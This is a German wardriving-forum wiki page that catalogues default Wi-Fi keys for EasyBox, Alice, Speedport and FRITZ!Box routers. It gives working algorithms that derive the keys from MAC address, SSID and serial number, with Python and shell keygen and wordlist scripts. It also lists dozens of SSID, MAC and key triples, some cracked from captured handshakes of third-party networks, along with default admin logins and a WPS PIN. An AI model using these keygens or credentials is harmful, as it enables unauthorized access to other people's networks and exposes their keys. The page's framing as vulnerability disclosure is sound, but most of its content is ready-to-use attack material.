Standardpasswörter

Aus Wardriving-Forum.de Enzyklopädie
Wechseln zu: Navigation, Suche

Inhaltsverzeichnis

[Bearbeiten] Einleitung

Diese Seite stellt lediglich einen Proof of Concept, ein Thesenpapier, dar. Es geht hierbei nicht darum, irgendwelche Passwörter zu knacken, sondern lediglich darum, Systeme und Methoden zu analysieren und zu verstehen, die uns alle alltäglich umgeben. Wenn Firmen Hardware und Software verkaufen, die den Eindruck von Sicherheit vermitteln, dann soll man sich darauf auch verlassen können. Wenn allerdings schon Laien ohne besondere Vorkenntnisse diese Sicherheitssysteme aushebeln und Verschlüsselungsmethoden erkennen können, dann stellt das für Profis erst recht keine Hürde mehr dar. Diese Seite dient dazu, solche Sicherheitsrisiken aufzudecken und Thesen für schwache Verschlüsselungsmuster aufzustellen. Es gibt immer wieder bei verschiedensten Anbietern Standardalgorithmen für die Erstellung der voreingestellten WEP-/WPA[2]-Keys (auch „Passphrase“ genannt) aus MAC (BSSID), Netzwerkname ((E)SSID) und Router-Seriennummern. [1] [2] [3] [4]


DESHALB: Postet bitte die Routerdaten in der Form:

[Bearbeiten] Anbieter

Modellname

SSID: Netzwerk-Name   MAC: 00:MA:CA:DR:E5:53   KEY: Pa55W0rt   SN: sER13n-Num_m3r




[Bearbeiten] Allgemein

Im Internet existieren Listen mit Standardkennungen für den Router-Login, zu finden hier: [5], [6], [7]

[Bearbeiten] Beschreibung

H = HEXadezimalwert (0-9 ... A-F) --> Super HEX-DEZ-etc-Umwandler: http://www.arndt-bruenner.de/mathe/scripts/Zahlensysteme.htm 'Z' = ZIFFER '#' = Unbekannter HEX-Wert

Anmerkung: z.B SN[1] oder MAC[1] beschreibt die ZWEITE STELLE. So ergibt sich aus 12345[2] = 3

Wer Ideen zu einer Methode/Regelmäßigkeiten hat, kann diese gern kurz anmerken.

[Bearbeiten] Router/Anbieter

[Bearbeiten] Arcor / EasyBox / Vodafone

SSID: Arcor-ABCDxy / EasyBox-ABCDxy / Vodafone-ABCDxy,  MAC: 00:1D:19:AB:CD:EF, KEY: HHHHHHHHH  SN: RZZZZXuvwY bzw RZZZZXuvwY2

Heise meldet, dass sich der Key aus der MAC vollständig konstruieren lässt!
http://www.heise.de/security/meldung/Vorkonfigurierte-WPA-Schluessel-bei-T-Online-und-Vodafone-leicht-erratbar-1326796.html
... und dass dies schon in größerem Stil genutzt wurde.
http://www.heise.de/security/meldung/Router-Schwachstelle-fuer-Telefonterror-missbraucht-1939225.html

Genauere Angaben über den Algorithmus gibt es nicht Es gibt eine Arbeit dazu:
zur Firmwareanalyse: http://sviehb.wordpress.com/

Arcadyan hat den Algorithmus zum Patent angemeldet (!!!) hier das Patent in deutsch:
http://www.patent-de.com/20081120/DE102007047320A1.html

Sebastian Petters hat unter http://www.wotan.cc/?p=6 den kompletten Algorithmus und ein Programm zum Berechnen des Schlüssels veröffentlicht!
Es gibt auch als Beispiel Quelltexte für Keygeneratoren als C, Java, Batch, Bash, ASM, PHP, Python und FreeBASIC:
http://www.wotan.cc/wp-content/uploads/2012/03/easybox_keygen_sources1.zip


Eine kostenlose Android App gibt es mittlerweile auch: SpeedKey - EasyBox WPA Key
http://forum.xda-developers.com/showthread.php?t=2036411

[Bearbeiten] ALGORITHMUS: (etwas vereinfacht)

>> MAC [Hexadezimal] zu Serial(dezimal) <<
 MAC: ##:##:##:##:0A:BC  >  [0ABC]  >>>  m5-Wert: S= 02748
 > M[]:  M1=[0], M2=[A], M3=[B], M4=[C]
 > S():  s1=0, s2=2, s3=7, s4=4, s5=8

>> S- und M-Werte folgenderweise
> addieren {als [HEX]-Werte, nicht als (Zahlen)!!! - vgl: DEZ: (8)+(8)=(16) <=/=> HEX: [8]+[8]=[10]} >>>
  [s2 + s3 + M3 + M4] >> [2 + 7 + B + C] = [20]  >>  X = [0]   MMMM sSSSS  => xX
  [M1 + M2 + s4 + s5] >> [0 + A + 4 + 8] = [16]  >>  Y = [6]   MMMM sSSSS  => yY
>> das jeweils letzte Byte ergibt die Variable X bzw. Y <<

 >> Erzeugen des KEYS aus M[],S(),X,Y << 
  k1 =  X XOR s5   >>   [0] × [8] = [8]      mmmm ssssS X y
  k2 = M2 XOR Y    >>   [A] × [6] = [C]      mMmm sssss x Y
  k3 = M3 XOR s5   >>   [B] × [8] = [3]      mmMm ssssS x y
  k4 =  X XOR s4   >>   [0] × [4] = [4]      mmmm sssSs X y
  k5 = M3 XOR Y    >>   [B] × [6] = [D]      mmMm sssss x Y
  k6 = M4 XOR s4   >>   [C] × [4] = [8]      mmmM sssSs x y
  k7 =  X XOR s3   >>   [0] × [7] = [7]      mmmm ssSss X y
  k8 = M4 XOR Y    >>   [C] × [6] = [A]      mmmM sssss x Y
  k9 =  X XOR Y    >>   [0] × [6] = [6]      mmmm sssss X Y

>> KEY = [k1,k2,k3,k4,k5,k6,k7,k8,k9] = "8C34D87A6"
>>> D.h. , es werden nur die letzten Vier der MAC benötigt,
>>> daraus folgt: für jeden Anbieter (Arcor, EasyBox, Vodafone) gibt es je nur nur {16^4 = } 65536 Keys!!!

Key besteht aus 9 HEX-Werten!
Bei der Erstellung der Seriennummer bzw der SSID fließt die MAC mit ein :
> für "{Anbieter}-ABCDXY" mit MAC: [00:*:*:AB:CD:EF] & SN: R####XuvwY2 gilt:
> $DEZ("CDEF") <<==>> $HEX("XuvwY") :=: letzten 4 der MAC: ["CDEF"] <=> letzte 5 der SN ("XuvwY") bzw letzten beiden der SSID ("XY")

- die letzten fünf, wenn 9-stellig, (bzw (letzten fünf vor der "2" am Schluss bei 10er) der SN
  in HEX umgerechnet ergeben die letzten 4 der MAC :=  HEX(XuvwY) => MAC: [00:*:*:*:CD:EF]
<-> umgekehrt:
    die letzten 4 Stellen der MAC werden von Hexadezimal zu Dezimal umgewandelt.
    nun gibt dieses Ergebnis die fünf (vor-)letzten Zeichen der SN (bei vierstelligem Ergebnis mit führender Null)
    dessen erster und letzter Wert sind letzten beiden Zeichen der SSID: Arcor-ABCDXY / EasyBox-ABCDXY / Vodafone-ABCDXY"

[Benutzername ist "root" und Standardkennwort ist "123456".]

[Bearbeiten] Arcor-Easybox ... diverse

SSID: EasyBox-ABCDEF MAC: hh:hh:hh:hh:hh:hh KEY: hhhhhhhhh SN: Rzzzzzzzzzz  m4: EzzzF

(m4=dezimal umgewandelter 4er-Rest der MAC)

                  MAC: 00:26:4D:38:95:7A   SSID: EasyBox-389536                                      m4: 38266
                  MAC: 88:25:2C:71:36:8C   SSID: EasyBox-713614                                      m4: 13964
SN: R#922318930   MAC: 00:23:08:A9:7C:95   SSID: EasyBox-A97C33 Key:'43AE6CFA8' (Easybox 602)        m4: 31893
SN: R0290650982   MAC: 88:25:2C:21:FE:4A                                        (DSL-Easybox 803A)   m4: 65098
SN: R9021017912   MAC: 00:23:08:54:06:FF                                        (DSL-Easybox 802)    m4: 01791
SN: R0130322532   MAC: 00:26:4D:84:7D:FD                                        (DSL-Easybox 802)    m4: 32253
SN: R0030147842   MAC: 00:26:4D:36:39:C0                                        (Arcor-Easybox A300) m4: 14784
SN: R651325190    MAC: 00:1A:2A:00:62:66                                        (Arcor-Easybox A300) m4: 25190
SN: R726237090    MAC: 00:1A:2A:C7:90:E2                                        (?)                  m4: 37090
SN: R7270214517   MAC: 00:1A:2A:AD:38:B5   SSID: Arcor-AD3817   Key: EBC884C6A  (A 800)              m4: 14517
SN: R643343619    MAC: 00:12:BF:D0:AA:63   SSID: Arcor-D0AA49   Key: B4F3824DC  (A 300)              m4: 43619
SN: R630003052    MAC: 00:12:BF:91:0B:EC   SSID: Arcor-910B02   Key: F9C8C9DEF  (A 600)              m4: 03052
SN: R808102709    MAC: 00:1D:19:8F:0A:95 > SSID: Arcor-8F0A09   KEY: E907A5064 (Vodafone EasyBoxA601) m4:02709
SN: R####XUVWY{2} MAC: 00:##:##:AB:CD:EF > SSID: Arcor-ABCDXY   KEY: ?????????          <<>>         m4: XUVWY

Easybox A300

SSID: Arcor-79FE60   MAC: 00:1D:19:79:FE:C4  KEY: 63469C71B  m4: 65220
SSID: Arcor-B2BF41   MAC: 00:1D:19:B2:BF:37  KEY: AF2E3227B  m4: 48951
SSID: Arcor-B66421   MAC: 00:1D:19:B6:64:FB  KEY: 64E2FEFB7  m4: 25851  R815225851
SSID: Arcor-2D7128   MAC: 00:23:08:2D:71:50  KEY: 61DE50E0E  m4: 29008  R843029008
SSID: Arcor-00A346   MAC: 00:1A:2A:00:A3:BC  KEY: 77D0FD885  m4: 41916  R652341916

Easybox A600

SSID: Arcor-B48F24   MAC: 00:1D:13:B4:3F:14  KEY: 4354DC34C

Easybox A401

SSID: EasyBox-DBFA60  MAC: 00:1D:19:DB:FA:28  KEY: ?  
SSID: EasyBox-B84D10  MAC: 00:1D:19:B8:4D:1C  KEY: ?
SSID: EasyBox-51AC43  MAC: 00:1D:19:51:AC:0B  KEY: ?

Easybox 802

SSID: EasyBox-4B4516  MAC: 00:23:08:4B:45:20  Key: 9D46A9987  SN: R8500176962  m4: 17696
SSID: EasyBox-907639  MAC: 00:23:08:90:76:97  Key: AD06220C8  SN: R9220303592  m4: 30359
SSID: EasyBox-72D858  MAC: 00:26:4D:72:D8:48  Key: CBC27E7B7  SN: R0110553682  m4: 55368
SSID: EasyBox-0A3A17  MAC: 00:26:4D:0A:3A:A9  Key: FFD9F88CD  SN: R9480150172  m4: 15017
SSID: EasyBox-C05D29  MAC: 00:26:4D:C0:5D:F1  Key: D260054EB                   m4: 24049
SSID: EasyBox-74C240                          Key: 1C816896F

Easybox 803 (neuere Modelle)

SSID: EasyBox-A54313  MAC: 74:31:70:A5:43:01  Key: bba6tUriq  SN: R1480171532  HWV: 01C FW: 30.05.211

Easybox 803A

SSID: EasyBox-A15F23 MAC: 7C:4F:B5:A1:5F:CB Key: 36F259529 Standard-WPS-Key: 28464853 FW: 30.05.219

[Bearbeiten] ALICE

Alice IAD WLAN 4421

SSID: ALICE-WLAN69   MAC: 1C:C6:3C:1B:CA:27   Key  1514214718522703 (WPA2) SN: 2022019069
SSID: o2-WLAN61   MAC: 84:9C:A6:2B:71:B7   Key  1407926411788519 (WPA2) SN: 2122026861

Alice IAD WLAN 3231

SSID: ALICE-WLANxx   MAC: 00:1C:28:mm:mm:mm   Key: ZZZZZZZZZZZZZZZZ        SN: 1JMM4yyyyy  und   2917 286515 Ggg Aaa
SSID: ALICE-WLAN60   MAC: 00:1C:28:25:57:B7   Key: 4253211703024106 (WPA)  SN: 1912420926  und   2917 286515 G03 A00
SSID: ALICE-WLAN80   MAC: 00:1C:28:48:7F:AD
SSID: ALICE-WLAN03   MAC: 00:1C:28:30:23:AA
SSID: ALICE-WLAN75   MAC: 00:1C:28:1C:35:68
SSID: ALICE-WLAN45   MAC: 00:1C:28:3A:5E:3B
SSID: ALICE-WLAN22   MAC: 74:31:70:09:B6:A2
SSID: ALICE-WLANE8   MAC: 00:25:5E:73:B1:E9
SSID: ALICE-WLAN41   MAC: 1C:C6:3C:25:93:3D

Alice IAD WLAN 3232

SSID: ALICE-WLAN35   MAC: 00:1C:28:73:9D:20   Key: 0601250339635273 (WPA2) SN: 2206221135  und   286225 G02 A00

Alice Modem WLAN 1421 [Astoria Networks]

SSID: ALICE-WLAN52   MAC: 7C:4F:B5:22:31:41   Key: 3062350544930414 (WPA2) SN: 1011058252
SSID: ALICE-WLAN30   MAC: 7C:4F:B5:72:9B:E8   Key: 9240600912515474 (WPA2) SN: 1031001230

bitte mehr Daten! VOR ALLEM EURE KEYS !!!

Alice Modem WLAN 1121

SSID: ALICE-WLAN6A   MAC: 00:25:5E:B0:9F:6B   Key: ODMxMDRjM2NiN2Ri (WPA2)
SSID: ALICE-WLAN17   MAC: 00:1E:40:C9:DC:18   Key: OGFjY2YwYTZlMDg0 (WPA2)

Der Key wird nach folgendem Algorithmus generiert:

base64_encode(md5_hex(mac_des_ethernet_ohne_trenner_und_klein)[0..12])


Da die Wlan-Mac sich aus der Ethernet-Mac ergibt können wir also invers:

[mac_eth] = [wlan_mac - 1] auf die Ethernet-Mac schließen.

Folgender Python-Code zeigt den Algorithmus:

import hashlib, base64

mac_wlan = '00255E123456' # mac des wlans ohne trenner
mac_eth = '%s%02x' %(mac_wlan[:10], int(mac_wlan[10:],16)-1) # eth_mac = wlan_mac - 1
temp = hashlib.md5(mac_eth.lower()).hexdigest()[:12]
print base64.b64encode(temp)

ShellScript/AWK-Umsetzung zum besseren Verständnis

alicekey(){ echo "$1" | awk '
function fromhex(x,  h,i,n,l){ h = "0123456789ABCDEF..........abcdef"
  for (i = l = length(x); i > 0; i--){
    n += (index(h, substr(x, i, 1)) - 1) % 16 * 16 ^ (l - i) } return n }
BEGIN{ getline; gsub(/:/,"");
  printf "%s", tolower(substr($0,0,10)sprintf("%02x",fromhex(substr($0,11,2))-1))}'|
  md5sum - | cut -f 1 -d ' ' | base64 | cut -c -16; }

Habe den Algorithmus gegen eine große Handshake-Liste laufen lassen. Die Treffer belegen die Korrektheit des Algorithmus.

SSID: ALICE-WLANC3   MAC: 00:1E:40:A0:84:C4   Key: MGIwMjhjYTYzZmM0
SSID: ALICE-WLAND3   MAC: 00:25:5E:27:48:D4   Key: ZjkzZTU4NjdlZTli
SSID: ALICE-WLAN0E   MAC: 00:25:5E:6B:DA:0F   Key: NTQ0ZTZiZGUxOGU1
SSID: lema-virus     MAC: 00:25:5E:25:C0:B6   Key: NzQ2ZGVkMDc1ZTYy
SSID: ALICE-WLANAB   MAC: 00:25:5E:C7:63:AC   Key: MmZmMWMyYjM2MGVh
SSID: ALICE-WLANC2   MAC: 00:25:5E:46:53:C3   Key: NWFmMDI2YzBiYWVj
SSID: ALICE-WLANFA   MAC: 00:25:5E:B8:0B:FB   Key: ZDE1YTAxNWEyYzE5
SSID: ALICE-WLANA8   MAC: 00:25:5E:B7:DF:A9   Key: ODU4MmNhMDFkNDlh
SSID: ALICE-WLAN32   MAC: 00:25:5E:74:83:33   Key: YTFmNTYyMmQ2YmRk
SSID: einszweidrei   MAC: 00:25:5E:D6:78:83   Key: ZTlhZjI3MmQ3M2Yw
SSID: hagebau        MAC: 00:25:5E:C7:39:67   Key: YjkwMzVkM2U5ZTk5
SSID: ALICE-WLAN4D   MAC: 00:25:5E:D7:20:4E   Key: MTAxNWIyMjVkNzRh
SSID: claudeplace2   MAC: 00:25:5E:74:65:F5   Key: MzVjZmZkOGMxMjc2
SSID: ALICE-WLAN5D   MAC: 00:25:5E:05:C4:5E   Key: ODFjNTMyMTk5YWMw

Zum testen des Algorithmus auf Korrektheit hier eine Android App. AliceKey [8]

[Bearbeiten] THOMSON

SSID: Thom_D010268  MAC: 00:24:D1:85:F1:B7
[SSID:T***********  MAC: 00:24:D1:85:F1:2B]
SSID: Thom_D010869  MAC: 00:24:D1:89:24:F6
SSID: Thom_D007860  MAC: 00:26:24:B7:A4:FF
SSID: Thom_D014370  MAC: 00:26:24:88:B9:21  Key: 771c8750947416872918db6c51   SN: 00984-139402414    [Modell: TCW750-4]

[und laut UserManual für Modell TCW750-4:]
ssid: Thom_D004706  mac: 00:11:e3:3a:a2:4b  key: hhhhhhhhhhhhhhhhhhhhhhhhhh   SN: 00780-628200010 
Login: "" Passwort: admin

[Bearbeiten] DLINK

DVA-G3342SD (Horstbox)

SSID: dlink  KEY: ZZZZZZZZZZZZ

[Bearbeiten] Deutsche Telekom

[Bearbeiten] Diverse Speedport-Modelle

Das Standardpasswort von Speedport-Routern mit elfstelliger SSID in der Form WLAN-HHHHHH (wobei H für eine groß geschriebene Hex-Ziffer steht) lässt sich vollständig aus MAC-Adresse und Seriennummer zusammensetzen, wobei man Teile der Seriennummer aus der SSID ablesen kann, so dass nur noch 3 unbekannte dezimale Ziffern verbleiben. Das bedeutet, es müssen höchstens 103 = 1000 verschiedene Schlüssel geprüft werden, um das Standardpasswort zu ermitteln.

Die Seriennummern der betroffenen Router bestehen aus einem J gefolgt von neun dezimalen Ziffern (Ausnahme: Speedport W 500). Der Standardschlüssel ergibt sich aus Teilen der MAC-Adresse und fünf der neun Ziffern, wobei zwei der fünf Ziffern mit den letzten beiden Stellen der SSID identisch sind. Es bleiben also die bereits erwähnten drei unbekannten dezimalen Ziffern.

Veranschaulicht sieht dies so aus:

SSID: WLAN-HHHHZZ   Key: SP-ZZZHHHZZZ   MAC: HH:HH:HH:HH:HH:HH  SN: JZZZZZZZZZ
------------------------------------------------------------------------------
SSID: WLAN-81DD62   Key: SP-692DA7349   MAC: 00:12:BF:81:DD:A7  SN: J619365492
SSID: WLAN-156F55   Key: SP-545FFB404   MAC: 00:1A:2A:15:5F:FB
SSID: WLAN-404571   Key: SP-7715C9447   MAC: 00:1A:2A:40:45:C9
SSID: WLAN-DCCE08   Key: SP-008E32310   MAC: 00:1A:2A:DC:CE:32
SSID: WLAN-E1D270   Key: SP-7802ED318   MAC: 00:12:BF:E1:D2:ED
SSID: WLAN-A2DA56   Key: SP-566AFA306
SSID: WLAN-0AAD04   Key: SP-034D84443
SSID: WLAN-DF3349   Key: SP-419356361

SSID: WLAN-abcdGH   KEY: SP-GzHDEFxyz   MAC: 00:##:##:ab:cD:EF  SN: JZZZxGZyzH


Die zehnte Stelle der SSID entspricht der sechsten Stelle der Seriennummer und die elfte Stelle der SSID der zehnten Stelle der Seriennummer, d.h. es gilt SSID[9] = SN[5] und SSID[10] = SN[9].

Zur Berechnung des Standardschlüssels werden zwei Algorithmen eingesetzt, wobei der zu verwendende vom Routermodell abhängt:

[Bearbeiten] „Standard“-Algorithmus

Der Schlüssel setzt sich zusammen aus:

"SP-" + SN[5] + SN[8] + SN[9] + MAC[9] + MAC[10] + MAC[11] + SN[4] + SN[7] + SN[8].

SN[5] und SN[9] können durch SSID[9] und SSID[10] ersetzt werden. Dann sind nur noch X = SN[4], Y = SN[7] und Z = SN[8] unbekannt:

Key = "SP-" + SSID[9] + Z + SSID[10] + MAC[9] + MAC[10] + MAC[11] + X + Y + Z

Sollten in der MAC-Adresse Buchstaben vorkommen, müssen diese groß geschrieben werden.

[Bearbeiten] Skript für Wordlist
#!/usr/bin/python

import sys

if len(sys.argv) != 3:
    print "<SSID> <MAC>"
    sys.exit(1)

SSID = sys.argv[1]
MAC = sys.argv[2].replace(":", "").replace("-", "").upper()

for X in range(0, 10):
    for Y in range(0, 10):
        for Z in range (0, 10):
            print "SP-" + SSID[9] + str(Z) + SSID[10] + MAC[9:12] + str(X) + str(Y) + str(Z)

[Bearbeiten] „Erweiterter“ Algorithmus

Der erweiterte Algorithmus ist dem Standardalgorithmus sehr ähnlich. Die für den Standardschlüssel genutzten Daten werden allerdings in etwas abgeänderter Form in den Schlüssel eingebracht. Er besteht aus 16 dezimalen Ziffern und setzt sich wie folgt zusammen:

SN[5] + SN[8] + SN[9] + MAC_ASCII[8] + MAC_ASCII[9] + MAC_ASCII[10] + SN[4] + SN[7] + SN[8] + SSID_ASCII[6] + SSID_ASCII[7]

Man erhält also:

Key = SSID[9] + Z + SSID[10] + MAC_ASCII[8] + MAC_ASCII[9] + MAC_ASCII[10] + X + Y + Z + SSID_ASCII[6] + SSID_ASCII[7]

MAC_ASCII[i] steht hier für den dezimalen ASCII-Wert von MAC[i], wobei Buchstaben groß geschrieben werden:

MAC[i]        0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
MAC_ASCII[i] 48 49 50 51 52 53 54 55 56 57 65 66 67 68 69 70
[Bearbeiten] Skript für Erweiterung

   import sys
   
   def main(argv):
       if(len(argv) != 3):
           help()
           sys.exit(1)
   
       ssid, mac = argv[1], argv[2]
       key = input_2_key(ssid, mac)
       print ssid, mac, key
   
   def input_2_key(ssid, mac):
       mac = str.upper(mac).replace(':', )
       return ssid[9]+'Z'+ ssid[10]+str(ord(mac[8]))+str(ord(mac[9]))+str(ord(mac[10]))+'XYZ'+str(ord(ssid[6]))+ str(ord(ssid[7]))
   
   def help():
       print "usage: speed_port.py ssid mac"
       print " ssid : WLAN-******"
       print " mac  : **:**:**:**:**:**"
   
   if __name__ == "__main__":
       main(sys.argv)

[Bearbeiten] Skript für Wordlist
Das Kompilierte Programm sowie der Quellcode ist verfügbar auf Rapidshare:
http://rapidshare.com/files/95878045/Standardpasswortgeneratoren.rar

[Bearbeiten] Speedport W 500

Die Seriennummer des Speedport W 500 (nicht Speedport W 500V!) besteht nur aus sechs dezimalen Ziffern ohne vorangehende Zeichen. Der Algorithmus kann trotzdem auch bei diesem Modell angewendet werden, jedoch hängen SSID und Standardpasswort hier anscheinend nicht mit der Seriennummer zusammen.

[Bearbeiten] Beispiele

Modell SSID MAC Seriennummer Key
W 500 WLAN-9A3907 00:12:BF:9A:39:41 410678 SP-057941365
W 502V WLAN-903704 00:1D:19:90:37:DD SP-0947DD059
W 502V WLAN-845469 00:1D:19:84:54:E6 SP-6594E6115
W 700V WLAN-DF3349 SP-419356361
W 700V WLAN-A2DA56 SP-566AFA306
W 700V WLAN-156F55 00:1A:2A:15:5F:FB SP-545FFB404
W 700V WLAN-404571 00:1A:2A:40:45:C9 SP-7715C9447
W 723V Typ A WLAN-277A88 04:C0:6F:D8:27:76 1B27257218 5983127331945699
W 723V Typ A WLAN-AF7A10 84:A8:E4:D3:AF:7A 2406959452622444
W 723V Typ B WLAN-4C3113 04:C0:6F:C3:11:62 1434949540446751
W 723V Typ B WLAN-CC1E35 3056954650606749
W 921V WLAN-011D17 J130015347 1476855660344949
WLAN-81D17D62 00:12:BF:81:DD:A7 J619365492 SP-692DA7349
WLAN-DCCE08 00:1A:2A:DC:CE:32 SP-008E32310
WLAN-E1D270 00:12:BF:E1:D2:ED SP-7802ED318
WLAN-0AAD04 SP-034D84443

[Bearbeiten] Verlauf

Bisher wurde noch nicht von der Telekom bestätigt, dass die Algorithmen korrekt sind und dass die Seriennummer nach dem J nur aus Dezimalstellen besteht.

Speedport W 503V Typ A

SSID: WLAN-001F3F65AA97  Key: ZZZZZZZZZZZZZZZZ

Speedport W 701

SSID: WLAN-001A4F14C04D   Key: 6436364842209242
SSID: WLAN-001C4A4B0F00   Key: 7069939062000339   Mac Ethernet: 00:1c:4a:57:c2:45   MAC Wlan: 00:1C:4A:4B:0F:00   SN: W022 235.01.931.909

Die erste Ziffer des m4 Wertes SCHEINT die zweite Ziffer im Schlüssel zu sein. Schaut man sich den m4 Wert nochmal etwas genauer an, sieht man das die erste Ziffer im Key die Summe der ersten und vierten Stelle von m4 ist. Dies gilt scheinbar nur bei 5 stelligem m4 Wert. Bei einem 4 stelligem m4 Wert wird die Null nicht als erste Stelle gezählt d.h man addiert einfach die zweite und vierte Ziffer um die erste Stelle im Key zu erhalten.

Beispiel: C04D = 49229 erste und dritte Stelle addiert ist 6 0F00 = 03840 zweite und vierte Stelle addiert ist 7

Hierbei handelt es sich nur um Vermutungen!!!!

Speedport W 701V

SSID: WLAN-001C4A44EA**   Key: 0986427141966320
SSID: WLAN-001C4A4AC42B   Key: 1967720070980885  S/N: W015.235.01.921.254
ProductID	Fritz_Box_SpeedportW701V
wlan_key	5303946966528549
wlan_cal	03F5,000A,0014,00D6,010A,00DB,010A,02E4,02EC
usb_board_mac	00:1A:4F:BF:17:C3
usb_rndis_mac	00:1A:4F:BF:17:C4
maca		00:1A:4F:BF:17:C0
macb		00:1A:4F:BF:17:C1
macwlan		00:1A:4F:8D:CB:60
macdsl		00:1A:4F:BF:17:C2
ProductID	Fritz_Box_SpeedportW701V
wlan_key	0429080174791770
wlan_cal	0009,03FE,0019,00DF,010A,00E5,010A,031D,0326
usb_board_mac	00:1A:4F:5B:27:A5
usb_rndis_mac	00:1A:4F:5B:27:A6
maca		00:1A:4F:5B:27:A2
macb		00:1A:4F:5B:27:A3
macwlan		00:1A:4F:94:40:A1
macdsl		00:1A:4F:5B:27:A4
ProductID	Fritz_Box_SpeedportW701V
wlan_key	5589571207107455
wlan_cal	000F,0020,000D,00E2,010A,00E4,010A,0318,031E
usb_board_mac	00:1A:4F:A9:7F:21
usb_rndis_mac	00:1A:4F:A9:7F:22
maca		00:1A:4F:xx:7F:1E
macb		00:1A:4F:xx:7F:1F
macwlan		00:04:0E:yy:33:8E
macdsl		00:1A:4F:xx:7F:20
ProductID	Fritz_Box_SpeedportW701V
wlan_key	3577134058785966
wlan_cal	001C,03F2,000F,00D2,010A,00D2,010A,02E0,02DA
usb_board_mac	00:1A:4F:CB:E2:DC
usb_rndis_mac	00:1A:4F:CB:E2:DD
maca		00:1A:4F:CB:E2:D9
macb		00:1A:4F:CB:E2:DA
macwlan		00:1A:4F:90:5B:9E
macdsl		00:1A:4F:CB:E2:DB
ProductID	Fritz_Box_SpeedportW701V
wlan_key	9027020743054845
wlan_cal	0013,03F8,000A,00E1,010A,00E1,010A,02F5,02DA
usb_board_mac	00:1C:4A:AB:53:7A
usb_rndis_mac	00:1C:4A:AB:53:7B
maca		00:1C:4A:AB:53:77
macb		00:1C:4A:AB:53:78
macwlan		00:1C:4A:A0:AC:20
macdsl		00:1C:4A:AB:53:79
ProductID	Fritz_Box_SpeedportW701V
wlan_key        5481794691889719
Webinterface-Passwort: "0000"

Speedport W 722V

SSID: WLAN-001C4A078832   KEY: 2131384835709165 (WPA 1&2)
SSID: WLAN-001C4A4D91A3   KEY: 3206878255778322 (WPA 1&2)

Speedport W 900V

ProductID	Fritz_Box_DECT_W900V
wlan_key	2208796152188329
wlan_cal	03F7,000B,002B,00E5,010A,00E5,010A,0355,0335
usb_board_mac	00:1C:4A:0B:AE:74
usb_rndis_mac	00:1C:4A:0B:AE:75
maca		00:1C:4A:0B:AE:71
macb		00:1C:4A:0B:AE:72
macwlan		00:1C:4A:01:9C:63
macdsl		00:1C:4A:0B:AE:73
ProductID	Fritz_Box_DECT_W900V
wlan_key	0463525522353228
wlan_cal	03D3,03EC,0010,00F0,010A,0102,010A,02FD,034A
usb_board_mac	00:04:0E:DF:91:14
usb_rndis_mac	00:04:0E:DF:91:15
maca		00:04:0E:DF:91:10
macb		00:04:0E:DF:91:11
macwlan		00:04:0E:DF:91:12
macdsl		00:04:0E:DF:91:13

Speedport W 921V

WPS PIN Standard: 12345670
Funktioniert auch bei ausgeschaltetem WPS
WURDE MIT EINEM UPDATE GEFIXT!!

[Bearbeiten] FRITZ!Box

FRITZ!Box WLAN 3070

SSID: FRITZ!Box WLAN 3070   Key: ZZZZZZZZZZZZZZZZ (WPA2)    MAC: 00:04:0E:BC:BA:4F

FRITZ!Box WLAN 3130

ProductID	Fritz_Box_3130
wlan_key	9243175233098428
wlan_cal	000C,0009,0011,00F1,010A,00F3,010A,0338,0324
usb_board_mac	00:15:0C:E0:4D:20
usb_rndis_mac	00:15:0C:E0:4D:21
maca		00:15:0C:E0:4D:1C
macb		00:15:0C:E0:4D:1D
macwlan		00:15:0C:E0:4D:1E
macdsl		00:15:0C:E0:4D:1F

FRITZ!Box Fon WLAN 7050

SSID: FRITZ!Box Fon WLAN 7050   Key: ZZZZZZZZZZZZZ (WEP)
SSID: FRITZ!Box Fon WLAN 7050   Key: 8267261112060 (WEP)   Bssid: 00:04:0E:66:AF:A0
SSID: FRITZ!Box Fon WLAN 7050   Key: 7745054453727 (WEP)
SSID: FRITZ!Box Fon WLAN 7050   Key: 2209984011551 (WEP)   Bssid: 00:04:0E:96:2D:0D

FRITZ!Box Fon WLAN 7112 AVM

SSID: Fritz!Box Fon WLAN 7112   Key: 4609533710105260 (WPA2) Bssid: 00:24:FE:DE:C8:AC S/N: A13233300266548

FRITZ!Box Fon WLAN 7113

SSID: Fritz!Box Fon WLAN 7113   Key: 4407366693563498 (WPA)

FRITZ!Box Fon WLAN 7140

ProductID	Fritz_Box_7140
wlan_key	8465728015259231
wlan_cal	03F8,0006,001A,00ED,010A,00F0,010A,0342,0338 
usb_board_mac	00:15:0C:BF:0F:B8
usb_rndis_mac	00:15:0C:BF:0F:B9 
maca		00:15:0C:BF:0F:B4
macb		00:15:0C:BF:0F:B5
macwlan		00:15:0C:BF:0F:B6
macdsl		00:15:0C:BF:0F:B7 

FRITZ!Box Fon WLAN 7141

ProductID	Fritz_Box_7141
wlan_key	6093061239796083
wlan_cal	03D5,03F0,0013,00DD,010A,00E4,010A,0330,0338
usb_board_mac	00:1A:4F:BA:E0:A4
usb_rndis_mac	00:1A:4F:BA:E0:A5
maca		00:1A:4F:BA:E0:A1
macb		00:1A:4F:BA:E0:A2
macwlan		00:1A:4F:8C:F2:F6
macdsl		00:1A:4F:BA:E0:A3
ProductID	Fritz_Box_7141
wlan_key	7917743548467430
wlan_cal	0003,03EA,0019,00F4,010A,00F5,010A,0330,0328
usb_board_mac	00:15:0C:DF:7B:64
usb_rndis_mac	00:15:0C:DF:7B:65
maca		00:15:0C:DF:7B:60
macb		00:15:0C:DF:7B:61
macwlan		00:15:0C:DF:7B:62
macdsl		00:15:0C:DF:7B:63

FRITZ!Box Fon WLAN 7170

SSID: FRITZ!Box Fon WLAN 7170    KEY: ZZZZZZZZZZZZZZZZ (WPA)
SSID: FRITZ!Box Fon WLAN 7170    Key: 3337774933227880 (WPA)
SSID: FRITZ!Box Fon WLAN 7170    KEY: 8457682702212261 (WPA)
ProductID	Fritz_Box_7170
wlan_key	5623763321430091
wlan_cal	000A,03FD,000B,00EF,010A,00F0,010A,0376,034F
usb_board_mac	00:15:0C:C4:15:A3
usb_rndis_mac	00:15:0C:C4:15:A4
maca		00:15:0C:C4:15:9F
macb		00:15:0C:C4:15:A0
macwlan		00:15:0C:C4:15:A1
macdsl		00:15:0C:C4:15:A2

ProductID	Fritz_Box_7170
wlan_key	0509532117319914
wlan_cal	03E9,03EE,000F,00EE,010A,00EA,010A,0346,0346
usb_board_mac	00:1A:4F:EF:35:A1
usb_rndis_mac	00:1A:4F:EF:35:A2
maca		00:1A:4F:EF:35:9E
